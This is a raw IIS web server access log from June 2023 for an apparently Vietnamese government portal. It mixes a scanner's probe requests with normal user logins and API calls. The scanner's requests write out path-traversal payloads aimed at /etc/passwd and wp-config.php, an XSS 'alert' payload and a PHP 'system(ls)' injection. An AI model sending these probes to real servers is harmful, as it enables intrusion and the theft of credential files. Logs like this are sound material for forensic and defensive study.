Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 33 2023-06-27 03:35:09 103.153.214.94 POST /sws/app/gnb/login/login.jsp - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 35 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 03:55:19 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 03:55:19 103.153.214.94 GET /owa/auth/frowny.aspx app=people&esrc=MasterPage&et=ServerError&refurl=}}};alert(document.domain)//&te=\ 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 200 0 0 30 2023-06-27 04:01:59 103.153.214.94 GET /control/userimage.html - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 34 2023-06-27 04:02:02 103.153.214.94 GET /control/userimage.html - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 26 2023-06-27 04:03:45 103.153.214.94 GET /NCFindWeb filename=../../ierp/bin/prop.xml&service=IPreAlertConfigService 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 39 2023-06-27 04:17:25 103.153.214.94 GET /usuarios/ - 443 - 84.46.251.165 iTunes/9.0.3+(Macintosh;+U;+Intel+Mac+OS+X+10_6_2;+en-ca) - 200 0 0 222 2023-06-27 04:20:39 103.153.214.94 GET /index.php file=../../../../../../../../../etc/passwd&id=50 443 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 28 2023-06-27 04:29:29 103.153.214.94 GET /index.php controller=../../../../../../../../../../../../etc/passwd%00&option=com_kp 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 32 2023-06-27 04:31:23 103.153.214.94 GET /infusions/downloads/downloads.php cat_id=${system(ls)} 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 33 2023-06-27 04:33:41 103.153.214.94 GET /XMII/Catalog Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 34 2023-06-27 04:35:59 103.153.214.94 GET /index.php r=installer/welcome 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 200 0 0 31 2023-06-27 04:37:21 103.153.214.94 GET /SolarWinds/InformationService/v3/Json/Query query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 31 2023-06-27 04:37:24 103.153.214.94 GET /InformationService/v3/Json/Query query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 27 2023-06-27 04:39:39 103.153.214.94 POST /index.php q=result&searchfor=advancesearch 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 405 0 1 38 2023-06-27 04:40:33 103.153.214.94 GET /index.php download_file=../../../../../../../../../../../etc/passwd&option=com_jtagmembersdirectory&task=attachment 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 27 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 05:20:20 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 05:20:19 103.153.214.94 GET /status.htm - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 563 2023-06-27 05:25:45 103.153.214.94 GET /user/ - 443 - 84.46.251.165 HTC_Dream+Mozilla/5.0+(Linux;+U;+Android+1.5;+en-ca;+Build/CUPCAKE)+AppleWebKit/528.5++(KHTML,+like+Gecko)+Version/3.1.2+Mobile+Safari/525.20.1 - 200 0 0 227 2023-06-27 05:33:17 103.153.214.94 GET /password.cgi - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 40 2023-06-27 05:43:09 103.153.214.94 GET /nagios/side.php - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 33 2023-06-27 05:43:09 103.153.214.94 GET /nagios/side.php - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 32 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 06:08:38 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 06:08:38 103.153.214.94 GET /CFIDE/administrator/enter.cfm locale=../../../../../../../lib/password.properties%00en 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 497 2023-06-27 06:20:23 103.153.214.94 POST /contactus.php - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 33 2023-06-27 06:33:47 103.153.214.94 GET /user.php - 443 - 84.46.251.165 Mozilla/5.0+(Windows+NT+6.0;+rv:14.0)+Gecko/20100101+Firefox/14.0.1 - 200 0 0 231 2023-06-27 06:36:47 103.153.214.94 GET /system/console .css 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 33 2023-06-27 06:37:09 103.153.214.94 GET /index.php controller=../../../../../../../../etc/passwd&option=com_cartweberp 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 32 2023-06-27 06:49:07 103.153.214.94 POST /login.cgi - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 405 0 1 29 2023-06-27 06:56:59 103.153.214.94 GET /wp-content/plugins/brandfolder/callback.php wp_abspath=../../../wp-config.php%00 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 32 2023-06-27 07:04:19 103.153.214.94 POST /ucmdb-ui/cms/loginRequest.do; - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 32 2023-06-27 07:04:53 103.153.214.94 POST /druid/indexer/v1/sampler - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 405 0 1 29 2023-06-27 07:06:45 103.153.214.94 GET /wp-content/themes/NativeChurch/download/download.php file=../../../../wp-config.php 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 47 2023-06-27 07:07:01 103.153.214.94 GET /_vti_pvt/service.pwd - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 29 2023-06-27 07:08:43 103.153.214.94 GET /management - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 30 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 07:39:58 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 07:39:57 103.153.214.94 GET / - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://chat.zalo.me/ 200 0 0 575 2023-06-27 07:39:59 103.153.214.94 GET /runtime-es2015.js - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 44 2023-06-27 07:39:59 103.153.214.94 GET /main-es2015.js - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 102 2023-06-27 07:39:59 103.153.214.94 GET /polyfills-es2015.js - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 143 2023-06-27 07:39:59 103.153.214.94 GET /styles-es2015.js - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 225 2023-06-27 07:39:59 103.153.214.94 GET /vendor-es2015.js - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 556 2023-06-27 07:40:00 103.153.214.94 GET /manager-manager-module-ngfactory-es2015.js - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 705 2023-06-27 07:40:01 103.153.214.94 GET /assets/images/logo.png - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/login 200 0 0 81 2023-06-27 07:40:01 103.153.214.94 GET /assets/images/PTI_GDT.png - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/login 200 0 0 80 2023-06-27 07:40:03 103.153.214.94 GET /favicon.ico - 443 - 123.16.149.9 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/login 200 0 0 65 2023-06-27 07:40:29 103.153.214.94 POST /api/Login/Authenticate - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/login 401 0 0 7321 2023-06-27 07:40:31 103.153.214.94 POST /api/Login/Authenticate - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/login 200 0 0 737 2023-06-27 07:40:31 103.153.214.94 GET /assets/images/interface.svg - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/dashboard 200 0 0 28 2023-06-27 07:40:31 103.153.214.94 GET /assets/images/pti_gdt_while.png - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/dashboard 200 0 0 110 2023-06-27 07:40:33 103.153.214.94 GET /api/Login/GetMenu - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/login 200 0 0 851 2023-06-27 07:40:34 103.153.214.94 GET /api/odata/HoSoes $expand=SYS_DonVi&$filter=TrangThai%20eq%202&$inlinecount=allpages&$top=0 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/dashboard 200 0 0 2086 2023-06-27 07:40:34 103.153.214.94 GET /api/HoSoes/ThongKeHoSo IDDV= 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/dashboard 200 0 0 2271 2023-06-27 07:40:34 103.153.214.94 GET /api/odata/DonVis $expand=SYS_VaiTroLoaiDonVi&$filter=SYS_VaiTroLoaiDonVi/Ma%20eq%20%27DN%27&$select=ID,MaDonVi,TenDonVi 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/dashboard 200 0 0 2790 2023-06-27 07:40:51 103.153.214.94 GET /usuarios/login.php - 443 - 84.46.251.165 Mozilla/5.0+(Linux;+Android+11;+Mi+A3+Build/RKQ1.200903.002;+wv)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/101.0.4951.41+YaBrowser/22.1.0.194+(lite)+Mobile+Safari/537.36 - 200 0 0 238 2023-06-27 07:40:59 103.153.214.94 GET /api/odata/DonVis $expand=SYS_VaiTroLoaiDonVi&$filter=SYS_VaiTroLoaiDonVi/Ma%20eq%20%27DN%27&$select=ID,MaDonVi,TenDonVi 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/phe-duyet 200 0 0 59 2023-06-27 07:40:59 103.153.214.94 GET /data-table.woff - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 38 2023-06-27 07:40:59 103.153.214.94 GET /api/HoSoes/GetListPheDuyet TenHoSo=&LoaiHoSo=&IDDV=&StartDate=2023-01-01&EndDate=2023-06-30&TrangThai=null&skip=0&take=10 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/phe-duyet 200 0 0 753 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/Measurement/t9n/Measurement_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 33 2023-06-27 07:41:03 103.153.214.94 GET /2-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 42 2023-06-27 07:41:03 103.153.214.94 GET /7-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 41 2023-06-27 07:41:03 103.153.214.94 GET /5-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 76 2023-06-27 07:41:03 103.153.214.94 GET /8-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 75 2023-06-27 07:41:03 103.153.214.94 GET /10-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 76 2023-06-27 07:41:03 103.153.214.94 GET /12-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 74 2023-06-27 07:41:03 103.153.214.94 GET /11-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 99 2023-06-27 07:41:03 103.153.214.94 GET /3-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 106 2023-06-27 07:41:03 103.153.214.94 GET /1-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 135 2023-06-27 07:41:03 103.153.214.94 GET /13-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 127 2023-06-27 07:41:03 103.153.214.94 GET /47-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 127 2023-06-27 07:41:03 103.153.214.94 GET /22-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 127 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/Attribution/t9n/Attribution_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 86 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/Zoom/t9n/Zoom_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 85 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/Popup/t9n/Popup_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 85 2023-06-27 07:41:03 103.153.214.94 GET /esri/t9n/common_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 85 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/BasemapToggle/t9n/BasemapToggle_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 85 2023-06-27 07:41:03 103.153.214.94 GET /esri/t9n/basemaps_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 84 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/Home/t9n/Home_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 76 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/Locate/t9n/Locate_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 75 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/Print/t9n/Print_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 75 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/Expand/t9n/Expand_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 75 2023-06-27 07:41:03 103.153.214.94 GET /esri/widgets/LayerList/t9n/LayerList_vi.json - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 74 2023-06-27 07:41:03 103.153.214.94 GET /4-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 184 2023-06-27 07:41:03 103.153.214.94 GET /97-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 27 2023-06-27 07:41:03 103.153.214.94 GET /15-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 30 2023-06-27 07:41:03 103.153.214.94 GET /99-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 27 2023-06-27 07:41:03 103.153.214.94 GET /common-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 41 2023-06-27 07:41:03 103.153.214.94 GET /basemap-toggle-64.svg - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 32 2023-06-27 07:41:03 103.153.214.94 GET /63-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 27 2023-06-27 07:41:03 103.153.214.94 GET /6-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 27 2023-06-27 07:41:03 103.153.214.94 GET /CalciteWebCoreIcons.ttf iz9r4h 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 25 2023-06-27 07:41:03 103.153.214.94 GET /64-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 25 2023-06-27 07:41:03 103.153.214.94 GET /76-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 28 2023-06-27 07:41:03 103.153.214.94 GET /103-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 29 2023-06-27 07:41:03 103.153.214.94 GET /25-es2015.js - 443 - 14.162.197.54 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn/manager/map 200 0 0 41 2023-06-27 07:41:05 103.153.214.94 GET /loading-throb.gif - 443 - 123.16.148.14 